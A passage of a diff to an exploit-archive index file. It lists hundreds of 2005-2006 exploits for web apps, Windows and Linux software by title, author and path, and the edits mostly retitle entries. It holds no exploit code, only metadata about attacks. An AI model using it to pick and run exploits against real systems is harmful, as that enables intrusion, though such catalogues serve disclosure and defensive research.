(pl)",2005-12-19,kokanin,windows,dos,0 @@ -1151,16 +1151,16 @@ id,file,description,date,author,platform,type,port 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0 1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21 -1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 -1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 +1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0 +1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 (rating) Parameter Remote SQL Injection Exploit",2005-12-23,krasza,php,webapps,0 1387,platforms/php/webapps/1387.php,"Dev Web Management System <= 1.5 (cat) Remote SQL Injection Exploit",2005-12-24,rgod,php,webapps,0 1388,platforms/php/webapps/1388.pl,"phpBB <= 2.0.17 (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 -1389,platforms/windows/dos/1389.html,"MS Internet Explorer 6.0 (mshtml.dll datasrc) Denial of Service Vuln",2005-12-27,BuHa,windows,dos,0 +1389,platforms/windows/dos/1389.html,"Microsoft Internet Explorer 6.0 (mshtml.dll datasrc) Denial of Service Vuln",2005-12-27,BuHa,windows,dos,0 1390,platforms/multiple/dos/1390.c,"BZFlag <= 2.0.4 (undelimited string) Denial of Service Exploit",2005-12-27,"Luigi Auriemma",multiple,dos,0 1391,platforms/windows/remote/1391.pm,"Windows XP/2003 Metafile Escape() Code Execution Exploit (meta)",2005-12-27,"H D Moore",windows,remote,0 -1394,platforms/windows/dos/1394.html,"MS Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 -1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 +1394,platforms/windows/dos/1394.html,"Microsoft Internet Explorer 6.0 (mshtml.dll div) Denial of Service Exploit",2005-12-29,rgod,windows,dos,0 +1395,platforms/php/webapps/1395.php,"phpDocumentor <= 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1396,platforms/windows/dos/1396.cpp,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (cpp)",2005-12-29,Lympex,windows,dos,0 1397,platforms/linux/local/1397.c,"Linux Kernel <= 2.6.11 - (CPL 0) Local Root Exploit (k-rad3.c)",2005-12-30,alert7,linux,local,0 1398,platforms/php/webapps/1398.pl,"CubeCart <= 3.0.6 - Remote Command Execution Exploit",2005-12-30,cijfer,php,webapps,0 @@ -1188,7 +1188,7 @@ id,file,description,date,author,platform,type,port 1420,platforms/windows/remote/1420.c,"Microsoft Windows Metafile (WMF) Remote File Download Exploit Generator",2006-01-15,darkeagle,windows,remote,0 1421,platforms/windows/remote/1421.cpp,"Veritas NetBackup 4/5 Volume Manager Daemon Remote BoF Exploit",2006-01-16,"Patrick Thomassen",windows,remote,13701 1422,platforms/windows/dos/1422.c,"Cerberus FTP Server <= 2.32 Denial of Service Exploit",2006-01-16,pi3ch,windows,dos,0 -1423,platforms/windows/dos/1423.html,"MS Internet Explorer <= 6.x (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 +1423,platforms/windows/dos/1423.html,"Microsoft Internet Explorer <= 6.x - (IMG / XML elements) Denial of Service",2006-01-18,"Inge Henriksen",windows,dos,0 1424,platforms/windows/dos/1424.pl,"Tftpd32 2.81 - (GET Request) Format String Denial of Service PoC",2006-01-19,"Critical Security",windows,dos,0 1425,platforms/linux/local/1425.c,"Xmame <= 0.102 (-pb/-lang/-rec) Local Buffer Overflow Exploit",2006-01-21,sj,linux,local,0 1442,platforms/php/webapps/1442.pl,"ezDatabase <= 2.0 (db_id) Remote Command Execution Exploit",2006-01-22,cijfer,php,webapps,0 @@ -1201,7 +1201,7 @@ id,file,description,date,author,platform,type,port 1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 (par) Remote SQL Injection Exploit",2006-01-25,matrix_killer,php,webapps,0 1455,platforms/windows/local/1455.txt,"Oracle Database Server 9i/10g (XML) Buffer Overflow Exploit",2006-01-26,Argeniss,windows,local,0 1456,platforms/linux/remote/1456.c,"SHOUTcast <= 1.9.4 File Request Format String Exploit (Leaked)",2006-01-28,crash-x,linux,remote,8000 -1457,platforms/php/webapps/1457.txt,"phpBB <= 2.0.19 XSS Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 +1457,platforms/php/webapps/1457.txt,"phpBB <= 2.0.19 - XSS Remote Cookie Disclosure Exploit",2006-01-29,threesixthousan,php,webapps,0 1458,platforms/windows/remote/1458.cpp,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (0Day)",2006-01-29,ATmaCA,windows,remote,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 (cookie) Remote Command Execution Exploit",2006-01-30,cijfer,php,webapps,0 1460,platforms/windows/remote/1460.pm,"Winamp <= 5.12 - (.pls) Remote Buffer Overflow Exploit (meta)",2006-01-31,"H D Moore",windows,remote,0 @@ -1219,7 +1219,7 @@ id,file,description,date,author,platform,type,port 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook <= 5.5 (Auth Bypass) SQL Injection Exploit",2006-02-06,Zodiac,asp,webapps,0 1473,platforms/hardware/dos/1473.c,"Sony/Ericsson Bluetooth (Reset Display) Denial of Service Exploit",2006-02-06,"Pierre Betouin",hardware,dos,0 1474,platforms/linux/remote/1474.pm,"Mozilla Firefox 1.5 location.QueryInterface() Code Execution (linux)",2006-02-07,"H D Moore",linux,remote,0 -1475,platforms/windows/dos/1475.html,"MS Internet Explorer 7.0 Beta 2 (urlmon.dll) Denial of Service Vuln",2006-02-07,"Tom Ferris",windows,dos,0 +1475,platforms/windows/dos/1475.html,"Microsoft Internet Explorer 7.0 Beta 2 (urlmon.dll) Denial of Service Vuln",2006-02-07,"Tom Ferris",windows,dos,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1479,platforms/qnx/local/1479.sh,"QNX Neutrino 6.2.1 (phfont) Race Condition Local Root Exploit",2006-02-08,kokanin,qnx,local,0 1480,platforms/osx/remote/1480.pm,"Mozilla Firefox 1.5 - location.QueryInterface() Code Execution (osx)",2006-02-08,"H D Moore",osx,remote,0 @@ -1235,12 +1235,12 @@ id,file,description,date,author,platform,type,port 1490,platforms/windows/local/1490.c,"Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (new)",2006-02-11,k3xji,windows,local,0 1491,platforms/php/webapps/1491.php,"DocMGR <= 0.54.2 (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection Exploit",2006-02-13,fRoGGz,php,webapps,0 -1493,platforms/php/webapps/1493.php,"EnterpriseGS <= 1.0 rc4 Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 +1493,platforms/php/webapps/1493.php,"EnterpriseGS <= 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 (install-0.9.7.php) Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1495,platforms/windows/local/1495.cpp,"Microsoft HTML Help Workshop (.hhp file) Buffer Overflow Exploit (3)",2006-02-14,darkeagle,windows,local,0 1496,platforms/hardware/dos/1496.c,"D-Link Wireless Access Point (Fragmented UDP) DoS Exploit",2006-02-14,"Aaron Portnoy",hardware,dos,0 1498,platforms/php/webapps/1498.php,"webSPELL <= 4.01 (title_op) Remote SQL Injection Exploit",2006-02-14,x128,php,webapps,0 -1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 +1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) <= 1.03 - Multiple SQL Injection Exploit",2006-02-15,"HACKERS PAL",php,webapps,0 1500,platforms/windows/dos/1500.cpp,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005)",2006-02-15,ATmaCA,windows,dos,0 1501,platforms/php/webapps/1501.php,"PHPKIT <= 1.6.1R2 (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1502,platforms/windows/remote/1502.py,"Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (2)",2006-02-16,redsand,windows,remote,0 @@ -1276,9 +1276,9 @@ id,file,description,date,author,platform,type,port 1533,platforms/php/webapps/1533.php,"4Images <= 1.7.1 (Local Inclusion) Remote Code Execution Exploit",2006-02-26,rgod,php,webapps,0 1534,platforms/sco/local/1534.c,"SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit",2006-02-26,prdelka,sco,local,0 1535,platforms/windows/dos/1535.c,"CrossFire <= 1.8.0 - (oldsocketmode) Remote Buffer Overflow PoC",2006-02-27,"Luigi Auriemma",windows,dos,0 -1536,platforms/windows/remote/1536.pm,"MS Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 +1536,platforms/windows/remote/1536.pm,"Microsoft Internet Explorer 6.0 SP0 IsComponentInstalled() Remote Exploit",2006-02-28,"H D Moore",windows,remote,0 1537,platforms/windows/remote/1537.pm,"Kerio Personal Firewall <= 2.1.4 - Remote Authentication Packet Overflow",2006-02-28,y0,windows,remote,44334 -1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access exploit",2006-02-28,Hessam-x,php,webapps,0 +1538,platforms/php/webapps/1538.pl,"farsinews <= 2.5 - Directory Traversal arbitrary (users.db) access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) <= 1.03 (misc.php COMMA) SQL Injection",2006-02-28,Devil-00,php,webapps,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 (nfsd) Remote Kernel Panic Denial of Service Exploit",2006-02-28,"Evgeny Legerov",bsd,dos,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit",2006-03-01,str0ke,php,webapps,0 @@ -1295,21 +1295,21 @@ id,file,description,date,author,platform,type,port 1552,platforms/windows/dos/1552.pl,"XM Easy Personal FTP Server 1.0 (Port) Remote Overflow PoC",2006-03-04,luka.research,windows,dos,0 1553,platforms/php/webapps/1553.pl,"Fantastic News <= 2.1.2 (script_path) Remote Code Execution Exploit",2006-03-04,uid0,php,webapps,0 1554,platforms/multiple/local/1554.c,"LibTiff 3.7.1 (BitsPerSample Tag) Local Buffer Overflow Exploit",2006-03-05,"Agustin Gianni",multiple,local,0 -1555,platforms/windows/local/1555.c,"MS Visual Studio 6.0 sp6 (Malformed .dbp File) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 +1555,platforms/windows/local/1555.c,"Microsoft Visual Studio 6.0 sp6 (Malformed .dbp File) Buffer Overflow Exploit",2006-03-05,Kozan,windows,local,0 1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod (load) Remote SQL Injection Exploit",2006-03-06,SkOd,php,webapps,0 1557,platforms/windows/dos/1557.c,"Freeciv <= 2.0.7 (Jumbo Malloc) Denial of Service Crash",2006-03-06,"Luigi Auriemma",windows,dos,0 1558,platforms/windows/dos/1558.c,"LieroX <= 0.62b Remote Server/Client Denial of Service Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 -1559,platforms/windows/dos/1559.c,"Sauerbraten <= 2006_02_28 Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 -1560,platforms/windows/dos/1560.c,"Cube <= 2005_08_29 Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 +1559,platforms/windows/dos/1559.c,"Sauerbraten <= 2006_02_28 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 +1560,platforms/windows/dos/1560.c,"Cube <= 2005_08_29 - Multiple BoF/Crash Vulnerabilities Exploit",2006-03-06,"Luigi Auriemma",windows,dos,0 1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 (xrms_file_root) Code Execution Exploit",2006-03-07,rgod,php,webapps,0 1562,platforms/asp/webapps/1562.pl,"CilemNews System <= 1.1 (yazdir.asp haber_id) SQL Injection Exploit",2006-03-07,nukedx,asp,webapps,0 1563,platforms/php/webapps/1563.pm,"Limbo CMS <= 1.0.4.2 (ItemID) Remote Code Execution Exploit (meta)",2006-03-07,sirh0t,php,webapps,0 -1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition <= 5.00 Multiple Vulnerabilities Exploit",2006-03-07,"Luigi Auriemma",windows,dos,0 +1564,platforms/windows/dos/1564.c,"Alien Arena 2006 Gold Edition <= 5.00 - Multiple Vulnerabilities Exploit",2006-03-07,"Luigi Auriemma",windows,dos,0 1565,platforms/windows/remote/1565.pl,"RevilloC MailServer 1.21 (USER) Remote Buffer Overflow Exploit PoC",2006-03-07,"securma massine",windows,remote,110 1566,platforms/php/webapps/1566.php,"Gallery <= 2.0.3 stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 1567,platforms/php/webapps/1567.php,"RedBLoG <= 0.5 (cat_id) Remote SQL Injection Exploit",2006-03-08,x128,php,webapps,0 1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 (memName) Remote SQL Injection Exploit",2006-03-09,DevilBox,asp,webapps,0 -1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x (date) Remote Code Execution Vulnerability",2006-03-09,Hessam-x,php,webapps,0 +1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution Vulnerability",2006-03-09,Hessam-x,php,webapps,0 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0 1573,platforms/php/webapps/1573.php,"Guppy <= 4.5.11 (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,webapps,0 @@ -1333,19 +1333,19 @@ id,file,description,date,author,platform,type,port 1592,platforms/windows/remote/1592.c,"Mercur Mailserver 5.0 SP3 (IMAP) Remote Buffer Overflow Exploit",2006-03-19,pLL,windows,remote,0 1593,platforms/windows/dos/1593.c,"Mercur Mailserver 5.0 SP3 (IMAP) Denial of Service Exploit",2006-03-19,Omni,windows,dos,0 1594,platforms/php/webapps/1594.py,"SoftBB 0.1 (mail) Remote Blind SQL Injection Exploit",2006-03-19,LOTFREE,php,webapps,0 -1595,platforms/php/webapps/1595.php,"gCards <= 1.45 Multiple Vulnerabilities All-In-One Exploit",2006-03-20,rgod,php,webapps,0 +1595,platforms/php/webapps/1595.php,"gCards <= 1.45 - Multiple Vulnerabilities All-In-One Exploit",2006-03-20,rgod,php,webapps,0 1596,platforms/linux/local/1596.txt,"X.Org X11 (X11R6.9.0/X11R7.0) Local Root Privilege Escalation Exploit",2006-03-20,"H D Moore",linux,local,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal <= 3.1.1 (downloadid) Remote SQL Injection Exploit",2006-03-20,nukedx,asp,webapps,0 -1598,platforms/windows/dos/1598.html,"MS Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 +1598,platforms/windows/dos/1598.html,"Microsoft Internet Explorer 6.0 (script action handlers) (mshtml.dll) DoS",2006-03-21,"Michal Zalewski",windows,dos,0 1599,platforms/windows/dos/1599.cpp,"Microsoft Windows 2003/XP - (IGMP v3) - Denial of Service Exploit (MS06-007)",2006-03-21,"Alexey Sintsov",windows,dos,0 1600,platforms/php/webapps/1600.php,"FreeWPS <= 2.11 (images.php) Remote Code Execution Exploit",2006-03-21,x128,php,webapps,0 1601,platforms/windows/dos/1601.c,"ASP.NET w3wp (COM Components) Remote Crash Exploit",2006-03-22,"Debasis Mohanty",windows,dos,0 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow Exploit",2006-03-22,"esca zoo",multiple,remote,11000 1603,platforms/windows/dos/1603.c,"Microsoft Windows 2003/XP - (IGMP v3) Denial of Service Exploit (MS06-007) (2)",2006-03-22,Firestorm,windows,dos,0 -1604,platforms/windows/dos/1604.html,"MS Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 +1604,platforms/windows/dos/1604.html,"Microsoft Internet Explorer 6.0 (mshtml.dll checkbox) Crash",2006-03-22,"Stelian Ene",windows,dos,0 1605,platforms/php/webapps/1605.php,"XHP CMS <= 0.5 (upload) Remote Command Execution Exploit",2006-03-22,rgod,php,webapps,0 -1606,platforms/windows/remote/1606.html,"MS Internet Explorer (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 -1607,platforms/windows/remote/1607.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 +1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer (createTextRang) Remote Code Execution Exploit",2006-03-23,darkeagle,windows,remote,0 +1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit",2006-03-23,ATmaCA,windows,remote,0 1608,platforms/php/webapps/1608.php,"WebAlbum <= 2.02pl COOKIE[skin2] Remote Code Execution Exploit",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket <= 0.71 (search.php) Remote SQL Injection Exploit",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar <= 1.0c [details_view.php] Remote SQL Injection",2006-03-25,undefined1_,php,webapps,0 @@ -1353,12 +1353,12 @@ id,file,description,date,author,platform,type,port 1612,platforms/php/webapps/1612.php,"CuteNews <= 1.4.1 (function.php) Local File Include Exploit",2006-03-26,"Hamid Ebadi",php,webapps,0 1613,platforms/windows/dos/1613.c,"Vavoom <= 1.19.1 [Multiple Vulnerabilities] Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 1614,platforms/windows/dos/1614.c,"csDoom <= 0.7 [Multiple Vulnerabilities] Denial of Service Exploit",2006-03-26,"Luigi Auriemma",windows,dos,0 -1615,platforms/windows/dos/1615.txt,"MS Office Products Array Index Bounds Error (unpatched) PoC",2006-03-27,posidron,windows,dos,0 +1615,platforms/windows/dos/1615.txt,"Microsoft Office Products Array Index Bounds Error (unpatched) PoC",2006-03-27,posidron,windows,dos,0 1616,platforms/php/webapps/1616.pl,"Aztek Forum 4.00 (myadmin.php) User Privilege Escalation Exploit",2006-03-26,Sparah,php,webapps,0 -1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x (sendpassword.php) SQL Injection Exploit",2006-03-28,rgod,php,webapps,0 +1617,platforms/php/webapps/1617.php,"PHPCollab 2.x / NetOffice 2.x - (sendpassword.php) SQL Injection Exploit",2006-03-28,rgod,php,webapps,0 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (1)",2006-03-28,No_Face_King,php,webapps,0 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog <= 1.21d Remote Command Execution Exploit (2)",2006-03-28,Hessam-x,php,webapps,0 -1620,platforms/windows/remote/1620.pm,"MS Internet Explorer (createTextRang) Remote Exploit (meta update)",2006-04-01,"Randy Flood",windows,remote,0 +1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer (createTextRang) Remote Exploit (meta update)",2006-04-01,"Randy Flood",windows,remote,0 1621,platforms/php/webapps/1621.php,"Plogger <= Beta 2.1 Administrative Credentials Disclosure Exploit",2006-03-28,rgod,php,webapps,0 1622,platforms/multiple/dos/1622.pl,"RealPlayer <= 10.5 (6.0.12.1040-1348) - SWF Buffer Overflow PoC",2006-03-28,"Federico L. Bossi Bonin",multiple,dos,0 1623,platforms/asp/webapps/1623.pl,"EzASPSite <= 2.0 RC3 (Scheme) Remote SQL Injection Exploit",2006-03-29,nukedx,asp,webapps,0 @@ -1366,11 +1366,11 @@ id,file,description,date,author,platform,type,port 1625,platforms/tru64/local/1625.pl,"Tru64 UNIX 5.0 (Rev. 910) edauth NLSPATH Buffer Overflow Exploit",2006-03-29,"Kevin Finisterre",tru64,local,0 1626,platforms/windows/remote/1626.pm,"PeerCast <= 0.1216 - Remote Buffer Overflow Exploit (win32) (meta)",2006-03-30,"H D Moore",windows,remote,7144 1627,platforms/php/webapps/1627.php,"Claroline <= 1.7.4 (scormExport.inc.php) Remote Code Execution Exploit",2006-03-30,rgod,php,webapps,0 -1628,platforms/windows/remote/1628.cpp,"MS Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 +1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer (createTextRang) Download Shellcoded Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1629,platforms/php/webapps/1629.pl,"SQuery <= 4.5 (libpath) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 (vwar_root2) Remote File Inclusion Exploit",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS <= 1.2.5 Cross Site Scripting / Remote Code Execution Exploit",2006-04-02,rgod,php,webapps,0 -1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 Remote File Inclusion Exploit",2006-04-02,uid0,php,webapps,0 +1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion Exploit",2006-04-02,uid0,php,webapps,0 1633,platforms/windows/dos/1633.c,"Total Commander 6.x - (unacev2.dll) Buffer Overflow PoC Exploit",2006-04-02,darkeagle,windows,dos,0 1634,platforms/linux/dos/1634.pl,"mpg123 0.59r Malformed mp3 (SIGSEGV) Proof of Concept",2006-04-02,nitr0us,linux,dos,0 1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 (installpath) Remote File Inclusion Exploit",2006-04-04,K-159,php,webapps,0 @@ -1398,8 +1398,8 @@ id,file,description,date,author,platform,type,port 1665,platforms/php/webapps/1665.pl,"Sphider <= 1.3 (configset.php) Arbitrary Remote Inclusion Exploit",2006-04-12,rgod,php,webapps,0 1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger <= 1.4 - Remote Code Execution Exploit",2006-04-12,rgod,php,webapps,0 1667,platforms/multiple/dos/1667.html,"Mozilla Firefox <= 1.5.0.1 / Camino <= 1.0 - Null Pointer Dereference Crash",2006-04-13,BuHa,multiple,dos,0 -1668,platforms/php/webapps/1668.php,"vBulletin ImpEx <= 1.74 Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 -1669,platforms/cgi/webapps/1669.pl,"Censtore <= 7.3.x (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 +1668,platforms/php/webapps/1668.php,"vBulletin ImpEx <= 1.74 - Remote Command Execution Exploit",2006-04-13,ReZEN,php,webapps,0 +1669,platforms/cgi/webapps/1669.pl,"Censtore <= 7.3.x - (censtore.cgi) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1670,platforms/cgi/webapps/1670.pl,"quizz <= 1.01 (quizz.pl) Remote Command Execution Exploit",2006-04-13,FOX_MULDER,cgi,webapps,0 1671,platforms/multiple/dos/1671.c,"panic-reloaded TCP Denial of Service Tool",2006-04-13,hash,multiple,dos,0 1672,platforms/php/webapps/1672.pl,"PAJAX <= 0.5.1 - Remote Code Execution Exploit",2006-04-13,Stoney,php,webapps,0 @@ -1436,7 +1436,7 @@ id,file,description,date,author,platform,type,port 1714,platforms/asp/webapps/1714.txt,"BK Forum <= 4.0 (member.asp) Remote SQL Injection Vulnerability",2006-04-24,n0m3rcy,asp,webapps,0 1715,platforms/osx/dos/1715.html,"Apple Mac OS X Safari <= 2.0.3 (417.9.2) (ROWSPAN) DoS PoC",2006-04-24,"Yannick von Arx",osx,dos,0 1716,platforms/multiple/dos/1716.html,"Mozilla Firefox <= 1.5.0.2 (js320.dll/xpcom_core.dll) Denial of Service PoC",2006-04-24,splices,multiple,dos,0 -1717,platforms/linux/remote/1717.c,"Fenice OMS 1.10 (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0 +1717,platforms/linux/remote/1717.c,"Fenice Oms 1.10 (long get request) Remote Buffer Overflow Exploit",2006-04-25,c0d3r,linux,remote,0 1718,platforms/hardware/dos/1718.pl,"OCE 3121/3122 Printer (parser.exe) Denial of Service Exploit",2006-04-26,sh4d0wman,hardware,dos,0 1719,platforms/multiple/local/1719.txt,"Oracle <= 10g Release 2 (DBMS_EXPORT_EXTENSION) Local SQL Exploit",2006-04-26,N1V1Hd,multiple,local,0 1720,platforms/php/webapps/1720.pl,"Invision Power Board <= 2.1.5 (lastdate) Remote Code Execution Exploit",2006-04-26,RusH,php,webapps,0 @@ -1474,28 +1474,28 @@ id,file,description,date,author,platform,type,port 1757,platforms/windows/dos/1757.c,"acFTP FTP Server <= 1.4 (USER) Remote Denial of Service Exploit",2006-05-06,Omni,windows,dos,0 1758,platforms/windows/dos/1758.pl,"TinyFTPD <= 1.4 (USER) Remote Buffer Overflow DoS",2006-05-06,[Oo],windows,dos,0 1759,platforms/asp/webapps/1759.txt,"VP-ASP 6.00 (shopcurrency.asp) Remote SQL Injection Vulnerability",2006-05-06,tracewar,asp,webapps,0 -1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 Multiple Vulnerabilities Exploit",2006-05-07,rgod,php,webapps,0 +1760,platforms/php/webapps/1760.php,"PHP-Fusion <= 6.00.306 - Multiple Vulnerabilities Exploit",2006-05-07,rgod,php,webapps,0 1761,platforms/php/webapps/1761.pl,"Jetbox CMS <= 2.1 (relative_script_path) Remote File Inclusion Exploit",2006-05-07,beford,php,webapps,0 1763,platforms/php/webapps/1763.txt,"ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability",2006-05-07,PiNGuX,php,webapps,0 1764,platforms/php/webapps/1764.txt,"EQdkp <= 1.3.0 (dbal.php) Remote File Inclusion Vulnerability",2006-05-07,OLiBekaS,php,webapps,0 -1765,platforms/php/webapps/1765.pl,"Dokeos LMS <= 1.6.4 (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0 +1765,platforms/php/webapps/1765.pl,"Dokeos Lms <= 1.6.4 (authldap.php) Remote File Include Exploit",2006-05-08,beford,php,webapps,0 1766,platforms/php/webapps/1766.pl,"Claroline e-Learning 1.75 (ldap.inc.php) Remote File Inclusion Exploit",2006-05-08,beford,php,webapps,0 1767,platforms/php/webapps/1767.txt,"ActualAnalyzer Server <= 8.23 (rf) Remote File Include Vulnerability",2006-05-08,Aesthetico,php,webapps,0 1768,platforms/php/webapps/1768.php,"ActualAnalyzer Pro <= 6.88 (rf) Remote File Include Exploit",2006-05-08,ReZEN,php,webapps,0 -1769,platforms/php/webapps/1769.txt,"phpListPro <= 2.01 Multiple Remote File Include Vulnerabilities",2006-05-08,Aesthetico,php,webapps,0 +1769,platforms/php/webapps/1769.txt,"phpListPro <= 2.01 - Multiple Remote File Include Vulnerabilities",2006-05-08,Aesthetico,php,webapps,0 1772,platforms/windows/local/1772.c,"Intel Wireless Service (s24evmon.exe) Shared Memory Exploit",2006-05-09,"Ruben Santamarta ",windows,local,0 1773,platforms/php/webapps/1773.txt,"phpRaid <= 3.0.b3 (phpBB/SMF) Remote File Inclusion Vulnerabilities",2006-05-09,"Kurdish Security",php,webapps,0 1774,platforms/php/webapps/1774.txt,"pafileDB <= 2.0.1 (mxBB/phpBB) Remote File Inclusion Vulnerability",2006-05-09,Darkfire,php,webapps,0 -1775,platforms/windows/dos/1775.html,"MS Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 +1775,platforms/windows/dos/1775.html,"Microsoft Internet Explorer <= 6.0.2900 SP2 (CSS Attribute) Denial of Service",2006-05-10,seven,windows,dos,0 1776,platforms/windows/remote/1776.c,"Medal of Honor (getinfo) Remote Buffer Overflow Exploit",2006-05-10,RunningBon,windows,remote,12203 1777,platforms/php/webapps/1777.php,"Unclassified NewsBoard <= 1.6.1 patch 1 Arbitrary Local Inclusion Exploit",2006-05-11,rgod,php,webapps,0 1778,platforms/php/webapps/1778.txt,"Foing <= 0.7.0 (phpBB) Remote File Inclusion Vulnerability",2006-05-12,"Kurdish Security",php,webapps,0 1779,platforms/php/webapps/1779.txt,"Php Blue Dragon CMS <= 2.9 